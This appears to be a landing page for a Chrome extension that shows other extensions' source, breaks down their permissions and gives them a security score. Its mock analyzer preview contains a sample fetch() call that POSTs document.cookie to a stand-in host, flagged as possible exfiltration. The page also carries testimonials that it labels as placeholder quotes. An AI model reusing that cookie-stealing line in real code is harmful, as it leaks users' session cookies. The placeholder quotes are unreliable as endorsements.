Chrome extension · Local-first analysis

Understand Chrome Extensions Before You Trust Them

View source code, analyze permissions, and detect security risks instantly.

Add to Chrome View Demo

Runs only in your browser
No telemetry by default

Source (CRX)extension_id…

toaster.jsBeautified

import { initToast } from "./toast"

const API = "https://api.vendor.example/v1"

// benign setup

initToast({ theme: "light" })

Risk heuristic · possible exfiltration

fetch("https://collect.bad-example.invalid/log", {
  method: "POST",
  body: JSON.stringify( { cookies: document.cookie })
});

Auto-flagged: outbound POST + sensitive page data (illustration only)

···

Extension preview

v8 · MV3

Safety score

70/ 100

Scanning manifest & scripts…

Everything you need to vet an extension

From manifest to network posture—designed for quick, confident decisions.

View extension source

Inspect manifest.json, background, content scripts, and bundled assets in one place.

Security score (0–100)

A clear, explainable score that combines permissions, host access, and common risk patterns.

Permission analysis

Break down scary permission strings into plain language and severity hints.

Host & network signals

See which origins the extension can touch and what outbound patterns look suspicious.

Risk warnings & heuristics

Surface red flags like broad <all_urls>, eval-like APIs, and more.

Developer-friendly UI

Fast keyboard flow, monospace views for JSON, and copy-friendly paths for filing issues.

How it works

Three steps between you and a safer install.

01
Open any Chrome extension page
Navigate to a listing on the Chrome Web Store (or your team’s internal gallery).
02
Click the extension icon
Our popup loads context for the page you’re viewing—no extra setup.
03
Instantly view source + risk analysis
Read the manifest, skim scripts, and review the score before you hit “Add to Chrome.”

Who it’s for

Built for anyone who touches extensions—no security PhD required.

Developers

Ship reviews faster. Compare manifests, spot risky APIs, and document findings for your team.

Security researchers

Triage extensions at scale with structured signals instead of zip grepping every build.

Everyday users

Install with confidence—plain-language summaries when you don’t read JSON for fun.

Security & privacy by design

Your analysis stays where it belongs—on your machine, in your session.

Runs locally in the browser
Source and heuristics are evaluated client-side without sending page text to us.
No data collection
We don’t fingerprint installs or log what extensions you inspect.
No external API calls
Offline-capable core flows—no cloud scoring service required for the basics.

See it in action

Real-style preview: store listing plus analyzer sidebar—safety score, permhash, and permission risk breakdown.

Chrome Web Store extension page with media carousel and reference safety score sidebar — Store listing · analyzer & safety score

Extension analyzer showing permissions with low, medium, and high risk tags — Permissions · risk levels & network scope

Trusted by cautious installers

Placeholder quotes for layout—replace with real feedback anytime.

“We used to unzip CRX files for every vendor extension. This cut triage time by more than half.”
Jordan M.
Staff Security Engineer

“Finally a UI that explains permissions without making me open DevTools on five tabs.”
Priya S.
Frontend Lead

“I check the score before I install anything. Feels like a nutrition label for extensions.”
Alex R.
Chrome Power User

Start using safer extensions today

Add the Extension Source Viewer & Security Analyzer to Chrome and make every install an informed one.

Add to Chrome View demo screenshots